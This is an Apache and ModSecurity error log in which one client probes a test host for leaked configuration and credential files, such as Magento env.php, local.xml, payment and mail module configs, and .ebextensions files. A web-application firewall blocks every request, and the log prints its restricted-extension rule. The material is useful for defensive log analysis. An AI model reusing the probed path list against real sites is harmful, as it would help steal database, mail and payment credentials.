[Fri Jan 16 03:20:08.876769 2026] [:error] [pid 1444040] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWPn_5sIyKhJ5GAzaSAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./configuration.php.old
[Fri Jan 16 03:20:08.877103 2026] [:error] [pid 1444040] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWPn_5sIyKhJ5GAzaSAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./configuration.php.old
[Fri Jan 16 03:20:08.877271 2026] [:error] [pid 1444040] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWPn_5sIyKhJ5GAzaSAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./configuration.php.old
[Fri Jan 16 03:20:17.312991 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:54392] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml, referer: http://economiasolidale.test.indacotrentino.com/app/etc/local.xml
[Fri Jan 16 03:20:17.500273 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:54398] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml, referer: http://economiasolidale.test.indacotrentino.com/app/etc/local.xml/
[Fri Jan 16 03:20:17.709883 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:54402] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml, referer: http://economiasolidale.test.indacotrentino.com//app/etc/local.xml
[Fri Jan 16 03:20:17.843730 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:54412] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml, referer: http://economiasolidale.test.indacotrentino.com/./app/etc/local.xml
[Fri Jan 16 03:20:18.170419 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:54428] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.additional, referer: http://economiasolidale.test.indacotrentino.com/app/etc/local.xml.additional/
[Fri Jan 16 03:20:18.323571 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:54440] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.additional, referer: http://economiasolidale.test.indacotrentino.com//app/etc/local.xml.additional
[Fri Jan 16 03:20:18.497201 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:54450] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.additional, referer: http://economiasolidale.test.indacotrentino.com/./app/etc/local.xml.additional
[Fri Jan 16 03:20:18.652558 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:54456] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: http://economiasolidale.test.indacotrentino.com/app/etc/env.php
[Fri Jan 16 03:20:18.816309 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:54468] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: http://economiasolidale.test.indacotrentino.com/app/etc/env.php/
[Fri Jan 16 03:20:18.955023 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:54480] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: http://economiasolidale.test.indacotrentino.com//app/etc/env.php
[Fri Jan 16 03:20:19.124296 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:54484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: http://economiasolidale.test.indacotrentino.com/./app/etc/env.php
[Fri Jan 16 03:20:19.344708 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:54496] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/config.php, referer: http://economiasolidale.test.indacotrentino.com/app/etc/config.php
[Fri Jan 16 03:20:19.453760 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:57248] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/config.php, referer: http://economiasolidale.test.indacotrentino.com/app/etc/config.php/
[Fri Jan 16 03:20:19.773466 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:57278] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/config.php, referer: http://economiasolidale.test.indacotrentino.com/./app/etc/config.php
[Fri Jan 16 03:20:19.981623 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:57294] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/core, referer: http://economiasolidale.test.indacotrentino.com/app/code/core/Mage/Core/Model/Email/Template.php
[Fri Jan 16 03:20:20.138691 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:57300] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/core, referer: http://economiasolidale.test.indacotrentino.com/app/code/core/Mage/Core/Model/Email/Template.php/
[Fri Jan 16 03:20:20.297222 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:57306] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/core, referer: http://economiasolidale.test.indacotrentino.com//app/code/core/Mage/Core/Model/Email/Template.php
[Fri Jan 16 03:20:20.411650 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:57314] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/core, referer: http://economiasolidale.test.indacotrentino.com/./app/code/core/Mage/Core/Model/Email/Template.php
[Fri Jan 16 03:20:20.631303 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:57330] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/local, referer: http://economiasolidale.test.indacotrentino.com/app/code/local/Mage/Core/Model/Email/Template.php
[Fri Jan 16 03:20:21.256981 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:57352] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/local, referer: http://economiasolidale.test.indacotrentino.com/./app/code/local/Mage/Core/Model/Email/Template.php
[Fri Jan 16 03:20:21.388015 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:57368] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/app/code/community/SendGrid/SendGrid/Model/Email.php
[Fri Jan 16 03:20:21.593570 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:57374] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/app/code/community/SendGrid/SendGrid/Model/Email.php/
[Fri Jan 16 03:20:21.733057 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:57380] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com//app/code/community/SendGrid/SendGrid/Model/Email.php
[Fri Jan 16 03:20:21.941948 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:57390] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/./app/code/community/SendGrid/SendGrid/Model/Email.php
[Fri Jan 16 03:20:22.079155 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:57394] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/app/code/community/Mailgun/Mailgun/Model/Email.php
[Fri Jan 16 03:20:22.261251 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:57408] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/app/code/community/Mailgun/Mailgun/Model/Email.php/
[Fri Jan 16 03:20:22.392618 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:57422] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com//app/code/community/Mailgun/Mailgun/Model/Email.php
[Fri Jan 16 03:20:22.570651 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:57438] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/./app/code/community/Mailgun/Mailgun/Model/Email.php
[Fri Jan 16 03:20:22.706087 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:57450] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/app/code/community/Stripe/Stripe/Model/Config.php
[Fri Jan 16 03:20:22.819272 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:57454] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/app/code/community/Stripe/Stripe/Model/Config.php/
[Fri Jan 16 03:20:23.013340 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:57468] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com//app/code/community/Stripe/Stripe/Model/Config.php
[Fri Jan 16 03:20:23.158623 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:57484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/./app/code/community/Stripe/Stripe/Model/Config.php
[Fri Jan 16 03:20:23.373056 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:57492] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/app/code/community/Aschroder/SMTPPro/etc/config.xml
[Fri Jan 16 03:20:23.498696 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:57496] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/app/code/community/Aschroder/SMTPPro/etc/config.xml/
[Fri Jan 16 03:20:23.650108 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:57500] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com//app/code/community/Aschroder/SMTPPro/etc/config.xml
[Fri Jan 16 03:20:23.779113 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:57516] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/community, referer: http://economiasolidale.test.indacotrentino.com/./app/code/community/Aschroder/SMTPPro/etc/config.xml
[Fri Jan 16 03:20:24.301642 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:57532] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/local, referer: http://economiasolidale.test.indacotrentino.com//app/code/local/Ebizmarts/Mandrill/etc/config.xml
[Fri Jan 16 03:20:24.463284 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:57542] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/code/local, referer: http://economiasolidale.test.indacotrentino.com/./app/code/local/Ebizmarts/Mandrill/etc/config.xml
[Fri Jan 16 03:20:24.574297 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:57558] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/design/adminhtml/base, referer: http://economiasolidale.test.indacotrentino.com/app/design/adminhtml/base/default/template/system/shipping/ups.phtml
[Fri Jan 16 03:20:24.751963 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:57562] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/design/adminhtml/base, referer: http://economiasolidale.test.indacotrentino.com/app/design/adminhtml/base/default/template/system/shipping/ups.phtml/
[Fri Jan 16 03:20:24.917172 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:57572] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/design/adminhtml/base, referer: http://economiasolidale.test.indacotrentino.com//app/design/adminhtml/base/default/template/system/shipping/ups.phtml
[Fri Jan 16 03:20:25.073127 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:57582] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/design/adminhtml/base, referer: http://economiasolidale.test.indacotrentino.com/./app/design/adminhtml/base/default/template/system/shipping/ups.phtml
[Fri Jan 16 03:21:01.498540 2026] [:error] [pid 1444226] [client 45.148.10.246:40624] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/mail.config"] [unique_id "aWmgjWcpoCUgeFICb0bf3wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/mail.config
[Fri Jan 16 03:21:01.498907 2026] [:error] [pid 1444226] [client 45.148.10.246:40624] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/mail.config"] [unique_id "aWmgjWcpoCUgeFICb0bf3wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/mail.config
[Fri Jan 16 03:21:01.499082 2026] [:error] [pid 1444226] [client 45.148.10.246:40624] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/mail.config"] [unique_id "aWmgjWcpoCUgeFICb0bf3wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/mail.config
[Fri Jan 16 03:21:01.956881 2026] [:error] [pid 1444031] [client 45.148.10.246:40632] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/mail.config"] [unique_id "aWmgjX-9MmrgwjmYTAJTvwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/mail.config
[Fri Jan 16 03:21:01.957223 2026] [:error] [pid 1444031] [client 45.148.10.246:40632] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/mail.config"] [unique_id "aWmgjX-9MmrgwjmYTAJTvwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/mail.config
[Fri Jan 16 03:21:01.957410 2026] [:error] [pid 1444031] [client 45.148.10.246:40632] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/mail.config"] [unique_id "aWmgjX-9MmrgwjmYTAJTvwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/mail.config
[Fri Jan 16 03:21:02.550850 2026] [:error] [pid 1444033] [client 45.148.10.246:40668] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-mail.config"] [unique_id "aWmgjtLJkp65ULFQ2YYiwAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/01-mail.config
[Fri Jan 16 03:21:02.551241 2026] [:error] [pid 1444033] [client 45.148.10.246:40668] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-mail.config"] [unique_id "aWmgjtLJkp65ULFQ2YYiwAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/01-mail.config
[Fri Jan 16 03:21:02.551417 2026] [:error] [pid 1444033] [client 45.148.10.246:40668] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-mail.config"] [unique_id "aWmgjtLJkp65ULFQ2YYiwAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/01-mail.config
[Fri Jan 16 03:21:02.676020 2026] [:error] [pid 1444226] [client 45.148.10.246:40674] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-mail.config"] [unique_id "aWmgjmcpoCUgeFICb0bf4AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/01-mail.config
[Fri Jan 16 03:21:02.676368 2026] [:error] [pid 1444226] [client 45.148.10.246:40674] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-mail.config"] [unique_id "aWmgjmcpoCUgeFICb0bf4AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/01-mail.config
[Fri Jan 16 03:21:02.676525 2026] [:error] [pid 1444226] [client 45.148.10.246:40674] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-mail.config"] [unique_id "aWmgjmcpoCUgeFICb0bf4AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/01-mail.config
[Fri Jan 16 03:21:02.853761 2026] [:error] [pid 1444032] [client 45.148.10.246:40688] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgjukMvq8uPO2ZciWrPAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/02-mail.config
[Fri Jan 16 03:21:02.854112 2026] [:error] [pid 1444032] [client 45.148.10.246:40688] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgjukMvq8uPO2ZciWrPAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/02-mail.config
[Fri Jan 16 03:21:02.854285 2026] [:error] [pid 1444032] [client 45.148.10.246:40688] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgjukMvq8uPO2ZciWrPAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/02-mail.config
